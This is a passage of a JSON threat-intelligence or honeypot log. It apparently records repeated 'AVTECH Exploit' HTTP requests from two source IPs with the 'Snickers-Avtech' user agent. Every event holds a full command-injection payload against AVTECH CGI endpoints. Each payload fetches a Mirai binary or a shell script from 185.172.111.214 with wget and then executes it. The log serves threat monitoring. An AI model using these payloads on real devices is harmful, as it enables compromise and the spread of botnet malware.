5431.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5432.       "post_data": "",
5433.       "target_port": 8888,
5434.       "protocol": "tcp",
5435.       "tags": [
5436.         {
5437.           "cve": "",
5438.           "category": "IoT",
5439.           "description": "AVTECH Exploit"
5440.         }
5441.       ],
5442.       "event_count": 1,
5443.       "first_seen": "2020-06-01T04:42:15Z",
5444.       "last_seen": "2020-06-01T04:42:15Z"
5445.     },
5446.     {
5447.       "event_id": "97ca1f27e76db32658a711c3823aff4f0e704495e81bb359049ce30b4b27dcea",
5448.       "source_ip_address": "193.142.146.34",
5449.       "country": "NL",
5450.       "user_agent": "Snickers-Avtech",
5451.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5452.       "post_data": "",
5453.       "target_port": 10243,
5454.       "protocol": "tcp",
5455.       "tags": [
5456.         {
5457.           "cve": "",
5458.           "category": "IoT",
5459.           "description": "AVTECH Exploit"
5460.         }
5461.       ],
5462.       "event_count": 1,
5463.       "first_seen": "2020-06-01T04:41:48Z",
5464.       "last_seen": "2020-06-01T04:41:48Z"
5465.     },
5466.     {
5467.       "event_id": "7d6ad8558358a7d345dbe9c888ea745a2371f89b0b79e066da2f44cc722bf2a9",
5468.       "source_ip_address": "193.142.146.34",
5469.       "country": "NL",
5470.       "user_agent": "Snickers-Avtech",
5471.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5472.       "post_data": "",
5473.       "target_port": 8443,
5474.       "protocol": "tcp",
5475.       "tags": [
5476.         {
5477.           "cve": "",
5478.           "category": "IoT",
5479.           "description": "AVTECH Exploit"
5480.         }
5481.       ],
5482.       "event_count": 2,
5483.       "first_seen": "2020-06-01T04:32:53Z",
5484.       "last_seen": "2020-06-01T04:41:32Z"
5485.     },
5486.     {
5487.       "event_id": "9560e14bb1436032c62a4f09e860bb2a0ce6a7b061030b2a4e20f13aab963d90",
5488.       "source_ip_address": "193.142.146.34",
5489.       "country": "NL",
5490.       "user_agent": "Snickers-Avtech",
5491.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5492.       "post_data": "",
5493.       "target_port": 3389,
5494.       "protocol": "tcp",
5495.       "tags": [
5496.         {
5497.           "cve": "",
5498.           "category": "IoT",
5499.           "description": "AVTECH Exploit"
5500.         }
5501.       ],
5502.       "event_count": 1,
5503.       "first_seen": "2020-06-01T04:36:13Z",
5504.       "last_seen": "2020-06-01T04:36:13Z"
5505.     },
5506.     {
5507.       "event_id": "d8ca79f558fc6d482ea0fbc590ee6589065a89cd1dca83a119cdaf785201f29b",
5508.       "source_ip_address": "193.142.146.34",
5509.       "country": "NL",
5510.       "user_agent": "Snickers-Avtech",
5511.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5512.       "post_data": "",
5513.       "target_port": 9002,
5514.       "protocol": "tcp",
5515.       "tags": [
5516.         {
5517.           "cve": "",
5518.           "category": "IoT",
5519.           "description": "AVTECH Exploit"
5520.         }
5521.       ],
5522.       "event_count": 1,
5523.       "first_seen": "2020-06-01T04:36:03Z",
5524.       "last_seen": "2020-06-01T04:36:03Z"
5525.     },
5526.     {
5527.       "event_id": "e8f9d7ce7f1f76cf98cbd9226a900d2fa051e95f2f4300bf8298276f2b71c29f",
5528.       "source_ip_address": "193.142.146.34",
5529.       "country": "NL",
5530.       "user_agent": "Snickers-Avtech",
5531.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5532.       "post_data": "",
5533.       "target_port": 8089,
5534.       "protocol": "tcp",
5535.       "tags": [
5536.         {
5537.           "cve": "",
5538.           "category": "IoT",
5539.           "description": "AVTECH Exploit"
5540.         }
5541.       ],
5542.       "event_count": 1,
5543.       "first_seen": "2020-06-01T04:35:59Z",
5544.       "last_seen": "2020-06-01T04:35:59Z"
5545.     },
5546.     {
5547.       "event_id": "027438a4ff88c2be36cbc2f4838d1d0d14c8e32b52f324cad699126d6d98d561",
5548.       "source_ip_address": "193.142.146.34",
5549.       "country": "NL",
5550.       "user_agent": "Snickers-Avtech",
5551.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5552.       "post_data": "",
5553.       "target_port": 50000,
5554.       "protocol": "tcp",
5555.       "tags": [
5556.         {
5557.           "cve": "",
5558.           "category": "IoT",
5559.           "description": "AVTECH Exploit"
5560.         }
5561.       ],
5562.       "event_count": 1,
5563.       "first_seen": "2020-06-01T04:35:49Z",
5564.       "last_seen": "2020-06-01T04:35:49Z"
5565.     },
5566.     {
5567.       "event_id": "3e903274656637eb67214d2161fcc61521530e45cbf7db234bcb97d2509555c0",
5568.       "source_ip_address": "193.142.146.34",
5569.       "country": "NL",
5570.       "user_agent": "Snickers-Avtech",
5571.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5572.       "post_data": "",
5573.       "target_port": 2083,
5574.       "protocol": "tcp",
5575.       "tags": [
5576.         {
5577.           "cve": "",
5578.           "category": "IoT",
5579.           "description": "AVTECH Exploit"
5580.         }
5581.       ],
5582.       "event_count": 1,
5583.       "first_seen": "2020-06-01T04:35:12Z",
5584.       "last_seen": "2020-06-01T04:35:12Z"
5585.     },
5586.     {
5587.       "event_id": "d98dc7aff46df7a3aa8b56813db01f8d1ee7f92015f5123f3537fa6c33e580fc",
5588.       "source_ip_address": "193.142.146.34",
5589.       "country": "NL",
5590.       "user_agent": "Snickers-Avtech",
5591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5592.       "post_data": "",
5593.       "target_port": 8123,
5594.       "protocol": "tcp",
5595.       "tags": [
5596.         {
5597.           "cve": "",
5598.           "category": "IoT",
5599.           "description": "AVTECH Exploit"
5600.         }
5601.       ],
5602.       "event_count": 2,
5603.       "first_seen": "2020-06-01T04:33:47Z",
5604.       "last_seen": "2020-06-01T04:35:11Z"
5605.     },
5606.     {
5607.       "event_id": "ae3c2e4a6f6876a28b9c0fbf343388347d8b44897996eb3249b5f25d755e9816",
5608.       "source_ip_address": "193.142.146.34",
5609.       "country": "NL",
5610.       "user_agent": "Snickers-Avtech",
5611.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5612.       "post_data": "",
5613.       "target_port": 37777,
5614.       "protocol": "tcp",
5615.       "tags": [
5616.         {
5617.           "cve": "",
5618.           "category": "IoT",
5619.           "description": "AVTECH Exploit"
5620.         }
5621.       ],
5622.       "event_count": 1,
5623.       "first_seen": "2020-06-01T04:34:59Z",
5624.       "last_seen": "2020-06-01T04:34:59Z"
5625.     },
5626.     {
5627.       "event_id": "bcc956572b607531fd29226e78228d361084d7b21cf73841e382867848e4ea18",
5628.       "source_ip_address": "193.142.146.34",
5629.       "country": "NL",
5630.       "user_agent": "Snickers-Avtech",
5631.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5632.       "post_data": "",
5633.       "target_port": 8081,
5634.       "protocol": "tcp",
5635.       "tags": [
5636.         {
5637.           "cve": "",
5638.           "category": "IoT",
5639.           "description": "AVTECH Exploit"
5640.         }
5641.       ],
5642.       "event_count": 1,
5643.       "first_seen": "2020-06-01T04:34:20Z",
5644.       "last_seen": "2020-06-01T04:34:20Z"
5645.     },
5646.     {
5647.       "event_id": "68c8f3d3e489b0771cfd2c9071c0000ab46a97e40c1344cc9cbc9035a6bd2047",
5648.       "source_ip_address": "193.142.146.34",
5649.       "country": "NL",
5650.       "user_agent": "Snickers-Avtech",
5651.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech; echo snickers_was_here HTTP/1.1",
5652.       "post_data": "",
5653.       "target_port": 8112,
5654.       "protocol": "tcp",
5655.       "tags": [
5656.         {
5657.           "cve": "",
5658.           "category": "IoT",
5659.           "description": "AVTECH Exploit"
5660.         }
5661.       ],
5662.       "event_count": 1,
5663.       "first_seen": "2020-06-01T04:33:59Z",
5664.       "last_seen": "2020-06-01T04:33:59Z"
5665.     },
5666.     {
5667.       "event_id": "dead80d7a8d8344f0d389f91e0ed7a0e7eb46c111c5b31873b723968c9ad1db7",
5668.       "source_ip_address": "193.142.146.34",
5669.       "country": "NL",
5670.       "user_agent": "Snickers-Avtech",
5671.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5672.       "post_data": "",
5673.       "target_port": 8112,
5674.       "protocol": "tcp",
5675.       "tags": [
5676.         {
5677.           "cve": "",
5678.           "category": "IoT",
5679.           "description": "AVTECH Exploit"
5680.         }
5681.       ],
5682.       "event_count": 1,
5683.       "first_seen": "2020-06-01T04:33:53Z",
5684.       "last_seen": "2020-06-01T04:33:53Z"
5685.     },
5686.     {
5687.       "event_id": "13d544dd3364976d0bf34596c3ac3ba4edef6ea81d45bd925244efdbd8bcde97",
5688.       "source_ip_address": "193.142.146.34",
5689.       "country": "NL",
5690.       "user_agent": "Snickers-Avtech",
5691.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech; echo snickers_was_here HTTP/1.1",
5692.       "post_data": "",
5693.       "target_port": 8443,
5694.       "protocol": "tcp",
5695.       "tags": [
5696.         {
5697.           "cve": "",
5698.           "category": "IoT",
5699.           "description": "AVTECH Exploit"
5700.         }
5701.       ],
5702.       "event_count": 1,
5703.       "first_seen": "2020-06-01T04:33:00Z",
5704.       "last_seen": "2020-06-01T04:33:00Z"
5705.     },
5706.     {
5707.       "event_id": "05e7f7e5114b3eaa42bcbc57c99c88b0c3bb43eea68326e004e0adcf8844edbf",
5708.       "source_ip_address": "193.142.146.34",
5709.       "country": "NL",
5710.       "user_agent": "Snickers-Avtech",
5711.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech; echo snickers_was_here HTTP/1.1",
5712.       "post_data": "",
5713.       "target_port": 5001,
5714.       "protocol": "tcp",
5715.       "tags": [
5716.         {
5717.           "cve": "",
5718.           "category": "IoT",
5719.           "description": "AVTECH Exploit"
5720.         }
5721.       ],
5722.       "event_count": 1,
5723.       "first_seen": "2020-06-01T04:32:59Z",
5724.       "last_seen": "2020-06-01T04:32:59Z"
5725.     },
5726.     {
5727.       "event_id": "3ea2749ea57936a4ebde54db9bbb24468358475b7631cc72cdb298ee0db9ee3d",
5728.       "source_ip_address": "193.142.146.34",
5729.       "country": "NL",
5730.       "user_agent": "Snickers-Avtech",
5731.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5732.       "post_data": "",
5733.       "target_port": 5001,
5734.       "protocol": "tcp",
5735.       "tags": [
5736.         {
5737.           "cve": "",
5738.           "category": "IoT",
5739.           "description": "AVTECH Exploit"
5740.         }
5741.       ],
5742.       "event_count": 1,
5743.       "first_seen": "2020-06-01T04:32:51Z",
5744.       "last_seen": "2020-06-01T04:32:51Z"
5745.     },
5746.     {
5747.       "event_id": "d06c6a3c34468123e9f8a5f6defaedf8f976ae7089e53c03a261bbac335118e7",
5748.       "source_ip_address": "35.193.32.21",
5749.       "country": "US",
5750.       "user_agent": "Snickers-Avtech",
5751.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
5752.       "post_data": "",
5753.       "target_port": 9002,
5754.       "protocol": "tcp",
5755.       "tags": [
5756.         {
5757.           "cve": "",
5758.           "category": "IoT",
5759.           "description": "AVTECH Exploit"
5760.         }
5761.       ],
5762.       "event_count": 1,
5763.       "first_seen": "2020-06-01T04:27:58Z",
5764.       "last_seen": "2020-06-01T04:27:58Z"
5765.     },
5766.     {
5767.       "event_id": "6f94c26c966fea6500ee3501ddf7fd6005c56f9b6f01e543d4a6f9892c8e53f8",
5768.       "source_ip_address": "35.193.32.21",
5769.       "country": "US",
5770.       "user_agent": "Snickers-Avtech",
5771.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
5772.       "post_data": "",
5773.       "target_port": 7001,
5774.       "protocol": "tcp",
5775.       "tags": [
5776.         {
5777.           "cve": "",
5778.           "category": "IoT",
5779.           "description": "AVTECH Exploit"
5780.         }
5781.       ],
5782.       "event_count": 1,
5783.       "first_seen": "2020-06-01T04:27:57Z",
5784.       "last_seen": "2020-06-01T04:27:57Z"
5785.     },
5786.     {
5787.       "event_id": "ab3eac1ccc6d6cf585ac4dfb0109c8e9e3baa6052afe8865b912e1bd30380f93",
5788.       "source_ip_address": "35.193.32.21",
5789.       "country": "US",
5790.       "user_agent": "Snickers-Avtech",
5791.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
5792.       "post_data": "",
5793.       "target_port": 9002,
5794.       "protocol": "tcp",
5795.       "tags": [
5796.         {
5797.           "cve": "",
5798.           "category": "IoT",
5799.           "description": "AVTECH Exploit"
5800.         }
5801.       ],
5802.       "event_count": 1,
5803.       "first_seen": "2020-06-01T04:27:56Z",
5804.       "last_seen": "2020-06-01T04:27:56Z"
5805.     },
5806.     {
5807.       "event_id": "fda2924dbbca1715125a6f67c1715fe31ee970f95ebb5a92716433bb22f2fd17",
5808.       "source_ip_address": "35.193.32.21",
5809.       "country": "US",
5810.       "user_agent": "Snickers-Avtech",
5811.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
5812.       "post_data": "",
5813.       "target_port": 9200,
5814.       "protocol": "tcp",
5815.       "tags": [
5816.         {
5817.           "cve": "",
5818.           "category": "IoT",
5819.           "description": "AVTECH Exploit"
5820.         }
5821.       ],
5822.       "event_count": 1,
5823.       "first_seen": "2020-06-01T04:27:54Z",
5824.       "last_seen": "2020-06-01T04:27:54Z"
5825.     },
5826.     {
5827.       "event_id": "e019eb29f643e48b3ea76af18c6a0f644155c7973dfd417d2e37cc832b371ecf",
5828.       "source_ip_address": "35.193.32.21",
5829.       "country": "US",
5830.       "user_agent": "Snickers-Avtech",
5831.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
5832.       "post_data": "",
5833.       "target_port": 7001,
5834.       "protocol": "tcp",
5835.       "tags": [
5836.         {
5837.           "cve": "",
5838.           "category": "IoT",
5839.           "description": "AVTECH Exploit"
5840.         }
5841.       ],
5842.       "event_count": 1,
5843.       "first_seen": "2020-06-01T04:27:54Z",
5844.       "last_seen": "2020-06-01T04:27:54Z"
5845.     },
5846.     {
5847.       "event_id": "5fee61b37fa2fa2f42df8c42df225da8c1f192a4b7c5d9a8af5be91483199a05",
5848.       "source_ip_address": "35.193.32.21",
5849.       "country": "US",
5850.       "user_agent": "Snickers-Avtech",
5851.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
5852.       "post_data": "",
5853.       "target_port": 9200,
5854.       "protocol": "tcp",
5855.       "tags": [
5856.         {
5857.           "cve": "",
5858.           "category": "IoT",
5859.           "description": "AVTECH Exploit"
5860.         }
5861.       ],
5862.       "event_count": 1,
5863.       "first_seen": "2020-06-01T04:27:52Z",
5864.       "last_seen": "2020-06-01T04:27:52Z"
5865.     },
5866.     {
5867.       "event_id": "712af48e0ddf80d76ee7360720c6ab4ddb2c3b34618821708f994f7d3131e342",
5868.       "source_ip_address": "35.193.32.21",
5869.       "country": "US",
5870.       "user_agent": "Snickers-Avtech",
5871.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
5872.       "post_data": "",
5873.       "target_port": 8443,
5874.       "protocol": "tcp",
5875.       "tags": [
5876.         {
5877.           "cve": "",
5878.           "category": "IoT",
5879.           "description": "AVTECH Exploit"
5880.         }
5881.       ],
5882.       "event_count": 1,
5883.       "first_seen": "2020-06-01T04:27:29Z",
5884.       "last_seen": "2020-06-01T04:27:29Z"
5885.     },
5886.     {
5887.       "event_id": "c5d64b47214be466d12b654e26637a6c37a9e47f13fb5ac6a78bb0af0a282355",
5888.       "source_ip_address": "35.193.32.21",
5889.       "country": "US",
5890.       "user_agent": "Snickers-Avtech",
5891.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
5892.       "post_data": "",
5893.       "target_port": 8443,
5894.       "protocol": "tcp",
5895.       "tags": [
5896.         {
5897.           "cve": "",
5898.           "category": "IoT",
5899.           "description": "AVTECH Exploit"
5900.         }
5901.       ],
5902.       "event_count": 1,
5903.       "first_seen": "2020-06-01T04:27:27Z",
5904.       "last_seen": "2020-06-01T04:27:27Z"
5905.     },
5906.     {
5907.       "event_id": "f9b90720571b897fa5e432e93cb7d6960c6f51f629ad8034e5a5765dbe06b162",
5908.       "source_ip_address": "35.193.32.21",
5909.       "country": "US",
5910.       "user_agent": "Snickers-Avtech",
5911.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
5912.       "post_data": "",
5913.       "target_port": 9002,
5914.       "protocol": "tcp",
5915.       "tags": [
5916.         {
5917.           "cve": "",
5918.           "category": "IoT",
5919.           "description": "AVTECH Exploit"
5920.         }
5921.       ],
5922.       "event_count": 1,
5923.       "first_seen": "2020-06-01T04:27:20Z",
5924.       "last_seen": "2020-06-01T04:27:20Z"
5925.     },
5926.     {
5927.       "event_id": "5a4efafdc1ffb4ce7c71f5bfa2f99250d9a1ca1e706622cdb216302145be860b",
5928.       "source_ip_address": "35.193.32.21",
5929.       "country": "US",
5930.       "user_agent": "Snickers-Avtech",
5931.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
5932.       "post_data": "",
5933.       "target_port": 7001,
5934.       "protocol": "tcp",
5935.       "tags": [
5936.         {
5937.           "cve": "",
5938.           "category": "IoT",
5939.           "description": "AVTECH Exploit"
5940.         }
5941.       ],
5942.       "event_count": 1,
5943.       "first_seen": "2020-06-01T04:27:18Z",
5944.       "last_seen": "2020-06-01T04:27:18Z"
5945.     },
5946.     {
5947.       "event_id": "90581e5031659b4cfdba5b3723c820a0a3fa82930d0c72f49566ac255624c1bd",
5948.       "source_ip_address": "35.193.32.21",
5949.       "country": "US",
5950.       "user_agent": "Snickers-Avtech",
5951.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh; echo snickers_was_here HTTP/1.1",
5952.       "post_data": "",
5953.       "target_port": 9200,
5954.       "protocol": "tcp",
5955.       "tags": [
5956.         {
5957.           "cve": "",
5958.           "category": "IoT",
5959.           "description": "AVTECH Exploit"
5960.         }
5961.       ],
5962.       "event_count": 1,
5963.       "first_seen": "2020-06-01T04:27:18Z",
5964.       "last_seen": "2020-06-01T04:27:18Z"
5965.     },
5966.     {
5967.       "event_id": "61cd570b2895aa4b5c6de586e9488c1be2cc70ff5767453d55826f41cd583ecd",
5968.       "source_ip_address": "35.193.32.21",
5969.       "country": "US",
5970.       "user_agent": "Snickers-Avtech",
5971.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
5972.       "post_data": "",
5973.       "target_port": 9200,
5974.       "protocol": "tcp",
5975.       "tags": [
5976.         {
5977.           "cve": "",
5978.           "category": "IoT",
5979.           "description": "AVTECH Exploit"
5980.         }
5981.       ],
5982.       "event_count": 1,
5983.       "first_seen": "2020-06-01T04:27:15Z",
5984.       "last_seen": "2020-06-01T04:27:15Z"
5985.     },
5986.     {
5987.       "event_id": "435a54f8c81bd35dd4170530fc77ba138f73da9419f10366aa134e6d9e30efeb",
5988.       "source_ip_address": "35.193.32.21",
5989.       "country": "US",
5990.       "user_agent": "Snickers-Avtech",
5991.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
5992.       "post_data": "",
5993.       "target_port": 8443,
5994.       "protocol": "tcp",
5995.       "tags": [
5996.         {
5997.           "cve": "",
5998.           "category": "IoT",
5999.           "description": "AVTECH Exploit"
6000.         }
6001.       ],
6002.       "event_count": 1,
6003.       "first_seen": "2020-06-01T04:26:51Z",
6004.       "last_seen": "2020-06-01T04:26:51Z"
6005.     },
6006.     {
6007.       "event_id": "4d304eb0ea816e50c6db53e44495c8655d7d2168a0f57804e9624338ed079da2",
6008.       "source_ip_address": "35.193.32.21",
6009.       "country": "US",
6010.       "user_agent": "Snickers-Avtech",
6011.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6012.       "post_data": "",
6013.       "target_port": 8088,
6014.       "protocol": "tcp",
6015.       "tags": [
6016.         {
6017.           "cve": "",
6018.           "category": "IoT",
6019.           "description": "AVTECH Exploit"
6020.         }
6021.       ],
6022.       "event_count": 1,
6023.       "first_seen": "2020-06-01T04:25:56Z",
6024.       "last_seen": "2020-06-01T04:25:56Z"
6025.     },
6026.     {
6027.       "event_id": "84419d5a3e8491698fc1c133b160cfd15a148076ee1a97330d16238d6e416c6e",
6028.       "source_ip_address": "35.193.32.21",
6029.       "country": "US",
6030.       "user_agent": "Snickers-Avtech",
6031.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6032.       "post_data": "",
6033.       "target_port": 2375,
6034.       "protocol": "tcp",
6035.       "tags": [
6036.         {
6037.           "cve": "",
6038.           "category": "IoT",
6039.           "description": "AVTECH Exploit"
6040.         }
6041.       ],
6042.       "event_count": 1,
6043.       "first_seen": "2020-06-01T04:23:44Z",
6044.       "last_seen": "2020-06-01T04:23:44Z"
6045.     },
6046.     {
6047.       "event_id": "e251548038d45692c99e423fc294231a3f44d44aa04c7a033357587051e0a84e",
6048.       "source_ip_address": "35.193.32.21",
6049.       "country": "US",
6050.       "user_agent": "Snickers-Avtech",
6051.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6052.       "post_data": "",
6053.       "target_port": 10243,
6054.       "protocol": "tcp",
6055.       "tags": [
6056.         {
6057.           "cve": "",
6058.           "category": "IoT",
6059.           "description": "AVTECH Exploit"
6060.         }
6061.       ],
6062.       "event_count": 1,
6063.       "first_seen": "2020-06-01T04:23:34Z",
6064.       "last_seen": "2020-06-01T04:23:34Z"
6065.     },
6066.     {
6067.       "event_id": "f4d2fa194f03ddd07e3c2c8aa5d345c26e5ce409a86cfb130968436900140e73",
6068.       "source_ip_address": "35.193.32.21",
6069.       "country": "US",
6070.       "user_agent": "Snickers-Avtech",
6071.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6072.       "post_data": "",
6073.       "target_port": 8123,
